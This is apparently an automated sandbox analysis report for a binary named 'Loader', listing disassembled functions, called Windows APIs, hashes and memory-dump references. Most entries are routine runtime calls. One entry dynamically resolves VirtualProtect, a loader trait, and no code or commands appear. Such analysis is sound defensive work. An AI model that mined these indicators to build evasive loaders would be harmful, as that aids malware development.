                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                  • Opcode ID: a68cb97fd23479af0a32b8e1b66ba6b1ab24fe03618414a20a067ca5ba596a23
                                                                                                  • Instruction ID: 014e889030dcf955d5b1ecae703c09737078cca3275db7b3fdf8a75ba11b6726
                                                                                                  • Opcode Fuzzy Hash: a68cb97fd23479af0a32b8e1b66ba6b1ab24fe03618414a20a067ca5ba596a23
                                                                                                  • Instruction Fuzzy Hash: 7EE01230640305BBEB242B61DC0AB593B549B00B56F240070FD0CE41F1DBA29A5099B4
                                                                                                  APIs
                                                                                                  • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00D4D7B1
                                                                                                    • Part of subcall function 00D45801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D46FD5,?,00000000,-00000008), ref: 00D45862
                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D4DA03
                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D4DA49
                                                                                                  • GetLastError.KERNEL32 ref: 00D4DAEC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 2112829910-0
                                                                                                  • Opcode ID: ef8265762874c23bdb00d6e46473d1172183b141cb0650662a8d741c65e317be
                                                                                                  • Instruction ID: 82a52bb09c43c81c5781dc12d4e26a9cc18c62cee8e2d19100ddef69c7475478
                                                                                                  • Opcode Fuzzy Hash: ef8265762874c23bdb00d6e46473d1172183b141cb0650662a8d741c65e317be
                                                                                                  • Instruction Fuzzy Hash: 78D179B5D042489FCF15CFA8C881AADBBB6FF09314F28416AE856EB351D770A941CF60
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AdjustPointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 1740715915-0
                                                                                                  • Opcode ID: 7915c3f0475611b58afe7dea3ccb23f4adf9ef32255b767827627a6ed1765062
                                                                                                  • Instruction ID: ee907328bb4045a527a5194bd8235fa823d1eaacd5f686dc4bc97bdfd0074029
                                                                                                  • Opcode Fuzzy Hash: 7915c3f0475611b58afe7dea3ccb23f4adf9ef32255b767827627a6ed1765062
                                                                                                  • Instruction Fuzzy Hash: 7951E372A052069FDB298F54D881BBAB7A9FF04311F18452DE9559B291D731ECC0CBB0
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D45801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D46FD5,?,00000000,-00000008), ref: 00D45862
                                                                                                  • GetLastError.KERNEL32 ref: 00D4B5DA
                                                                                                  • __dosmaperr.LIBCMT ref: 00D4B5E1
                                                                                                  • GetLastError.KERNEL32 ref: 00D4B61B
                                                                                                  • __dosmaperr.LIBCMT ref: 00D4B622
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 1913693674-0
                                                                                                  • Opcode ID: 8e3304c42bd64ccb2156f1766ec48890397d6ab5cb3b95d80099800c3f25efd3
                                                                                                  • Instruction ID: 4d9e8ca46e5ea1e4e6b0e5e2bdac888de91c0f5c4ffdb548230135cd224fd082
                                                                                                  • Opcode Fuzzy Hash: 8e3304c42bd64ccb2156f1766ec48890397d6ab5cb3b95d80099800c3f25efd3
                                                                                                  • Instruction Fuzzy Hash: D621F371600309AFDB20AF76CC848ABB7A9FF24374715851AF859DB251E730ED408BB0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1394db3c90124d369d7110d3d514eacec3eb3a395caf2824d78f98ec2b987be8
                                                                                                  • Instruction ID: c733222f5dd0c16da3c857bcbce6202ebd6c9124cefc7be3509ce7eecc68add5
                                                                                                  • Opcode Fuzzy Hash: 1394db3c90124d369d7110d3d514eacec3eb3a395caf2824d78f98ec2b987be8
                                                                                                  • Instruction Fuzzy Hash: 5221CD3222020DAF9B21EF75CC85A6A77A8EF40364F199524F819E7650EB31EC40DBB0
                                                                                                  APIs
                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 00D4C976
                                                                                                    • Part of subcall function 00D45801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D46FD5,?,00000000,-00000008), ref: 00D45862
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D4C9AE
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D4C9CE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 158306478-0
                                                                                                  • Opcode ID: 73dae66f2591af2345d16a41b03f2e9811418324495c0615151d6ce18ecc7634
                                                                                                  • Instruction ID: 00ed6c3bb440e46fd5ff7db839c4daa1cbded31df7d52c99c7df5820ff5de686
                                                                                                  • Opcode Fuzzy Hash: 73dae66f2591af2345d16a41b03f2e9811418324495c0615151d6ce18ecc7634
                                                                                                  • Instruction Fuzzy Hash: C911D2F2912B597FAB117BB66C8AC7F6E9CDE953E63550125F801E1206FE31CE0089B0
                                                                                                  APIs
                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00D539DF,00000000,00000001,?,?,?,00D4DB40,?,00000000,00000000), ref: 00D544A7
                                                                                                  • GetLastError.KERNEL32(?,00D539DF,00000000,00000001,?,?,?,00D4DB40,?,00000000,00000000,?,?,?,00D4D486,?), ref: 00D544B3
                                                                                                    • Part of subcall function 00D54510: CloseHandle.KERNEL32(FFFFFFFE,00D544C3,?,00D539DF,00000000,00000001,?,?,?,00D4DB40,?,00000000,00000000,?,?), ref: 00D54520
                                                                                                  • ___initconout.LIBCMT ref: 00D544C3
                                                                                                    • Part of subcall function 00D544E5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D54481,00D539CC,?,?,00D4DB40,?,00000000,00000000,?), ref: 00D544F8
                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00D539DF,00000000,00000001,?,?,?,00D4DB40,?,00000000,00000000,?), ref: 00D544D8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                  • String ID:
                                                                                                  • API String ID: 2744216297-0
                                                                                                  • Opcode ID: caffe0c9877745c3bded36a99341481c13ae6176bc4571a02b0d43455adf48a7
                                                                                                  • Instruction ID: 7a2fc4ff2dff6e693c59d00f70fddfda9d7121f537a97a98009db02eb751ca36
                                                                                                  • Opcode Fuzzy Hash: caffe0c9877745c3bded36a99341481c13ae6176bc4571a02b0d43455adf48a7
                                                                                                  • Instruction Fuzzy Hash: 36F0373A041324BBCF222FD5EC09A9E3F25FB493AAB054410FD18C5230D6718964DFB6
                                                                                                  APIs
                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00D3A347
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D3A356
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00D3A35F
                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00D3A36C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2933794660-0
                                                                                                  • Opcode ID: 472acaaa64d4f5092aa7355497ff0c7d3ffb73e19b09b722b99e176650c21b7e
                                                                                                  • Instruction ID: 8d89edd7c7494ecb4131dd961897051ae212997bc0e71d223859523e00d7eb9f
                                                                                                  • Opcode Fuzzy Hash: 472acaaa64d4f5092aa7355497ff0c7d3ffb73e19b09b722b99e176650c21b7e
                                                                                                  • Instruction Fuzzy Hash: FDF05F74D1030DEBCB04EBB4DA8999EBBF4FF1C205B9149A5A812E7210E630AB449F61
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: i-i/$=B
                                                                                                  • API String ID: 0-126065790
                                                                                                  • Opcode ID: fd32aa7c4cfeed04607af6ff24eb17a7e0b889e07f81a378baf026acb1dada2f
                                                                                                  • Instruction ID: 394910fe23922ef8f45c50edf5aab26095a83f32c0927f3fb208a6564b7ea91b
                                                                                                  • Opcode Fuzzy Hash: fd32aa7c4cfeed04607af6ff24eb17a7e0b889e07f81a378baf026acb1dada2f
                                                                                                  • Instruction Fuzzy Hash: 075187B5A043148FE720CF98EC40BDFB7E4FB89314F15467AEA589B382D67499018BD2
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeString
                                                                                                  • String ID: 0$?7g)
                                                                                                  • API String ID: 3341692771-1620791588
                                                                                                  • Opcode ID: dc74e7e31a035cc6da0004a03b346576f80cc374318cd49c129846d326b52e7e
                                                                                                  • Instruction ID: 86af199c4f9fd635fd2a4b42a104224c0eff2a0546c2be4d583a810264cb9b60
                                                                                                  • Opcode Fuzzy Hash: dc74e7e31a035cc6da0004a03b346576f80cc374318cd49c129846d326b52e7e
                                                                                                  • Instruction Fuzzy Hash: 2191B570508FC0CAE326863888987D7BFD11B66318F08499DD1FE4B3D2C7BA2159C76A
                                                                                                  APIs
                                                                                                  • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00D45071,?,?,00000000,00000000,00000000,?), ref: 00D45195
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EncodePointer
                                                                                                  • String ID: MOC$RCC
                                                                                                  • API String ID: 2118026453-2084237596
                                                                                                  • Opcode ID: 2ec2d12c3f9c2bf32af6d2bef4159f6b077e0da5689661120435235509e2f7e5
                                                                                                  • Instruction ID: 647250dd837f952a57188512e90137a92c8ab21e0c01c26f942eb2b4054cd3ea
                                                                                                  • Opcode Fuzzy Hash: 2ec2d12c3f9c2bf32af6d2bef4159f6b077e0da5689661120435235509e2f7e5
                                                                                                  • Instruction Fuzzy Hash: FC41BF31900609EFCF15DF98DD81AEEBBB5FF48300F18819AF908A7216D375AA50DB65
                                                                                                  APIs
                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00D44C53
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___except_validate_context_record
                                                                                                  • String ID: csm$csm
                                                                                                  • API String ID: 3493665558-3733052814
                                                                                                  • Opcode ID: 3e37b692289f94b2b2367cbbad17250b283c452d458dddb86ded277dc1ae8cbb
                                                                                                  • Instruction ID: a1ec42a93454d5a2e9b27863542b13ebf9d6e9a1263b7130587d37564ecdf953
                                                                                                  • Opcode Fuzzy Hash: 3e37b692289f94b2b2367cbbad17250b283c452d458dddb86ded277dc1ae8cbb
                                                                                                  • Instruction Fuzzy Hash: 3D31D172901218EBCF269F54CC85BAA7B66FF0931AB1D465AF8545A121C332CCE1DBB1
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc
                                                                                                  • String ID: @$VirtualProtect
                                                                                                  • API String ID: 190572456-29487290
                                                                                                  • Opcode ID: 5ad60019fe5e420dd93eb7d29772834812f2492cdbbceba85f5bb8f2b2760d4a
                                                                                                  • Instruction ID: bbaaff3146b4feda22f8e542c91b294fc88216cd22da5267659f7f4bb490dbdd
                                                                                                  • Opcode Fuzzy Hash: 5ad60019fe5e420dd93eb7d29772834812f2492cdbbceba85f5bb8f2b2760d4a
                                                                                                  • Instruction Fuzzy Hash: 5941E2B4901309DFCB04DFA9D99869EBBF0FF48304F108419E858AB350D775AA84CFA1
                                                                                                  APIs
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0042324D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                  • String ID: G%&$G%&
                                                                                                  • API String ID: 237503144-3960618973
                                                                                                  • Opcode ID: d8721f94cb874452083026eed3730bcea2780d263c8d4d89944c12ffca352aec
                                                                                                  • Instruction ID: 529b8afdffec9294dc8f884b7e1775e0d7c2f22389087f73d0e6aca8f15581c6
                                                                                                  • Opcode Fuzzy Hash: d8721f94cb874452083026eed3730bcea2780d263c8d4d89944c12ffca352aec
                                                                                                  • Instruction Fuzzy Hash: 30210E7460C354AFE314CF25E80071FBBE1FBC2B04F14C92DE4D96B281DA7999068B86